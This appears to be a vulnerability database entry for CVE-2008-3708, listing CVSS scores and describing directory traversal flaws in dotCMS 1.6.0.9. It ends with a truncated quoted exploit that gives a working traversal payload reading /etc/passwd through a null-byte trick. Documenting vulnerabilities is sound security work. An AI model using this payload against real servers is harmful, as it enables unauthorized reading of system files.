4.3
CVSSv2

CVE-2008-3708

Published: 19/08/2008 Updated: 29/09/2017
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
VMScore: 435
Vector: AV:N/AC:M/Au:N/C:P/I:N/A:N

Vulnerability Summary

Multiple directory traversal vulnerabilities in dotCMS 1.6.0.9 allow remote malicious users to read arbitrary files via a .. (dot dot) in the id parameter to (1) news/index.dot and (2) getting_started/macros/macros_detail.dot.

Vulnerable Product Search on Vulmon Subscribe to Product

dotcms dotcms 1.6.0.9

Exploits

++++++++++++++++++++++++++++++++++++++++++++++++++++++ + script:dotCMS + home: wwwdotcmsorg + demo: wwwdotcmsorg/the_dotcms/demos/demodot + founder: Don of h4cky0uorg + Vulnerability: Directory traversal ++++++++++++++++++++++++++++++++++++++++++++++++++++++ exploit: /indexdot?id=////////etc/passwd%00jpg /macr ...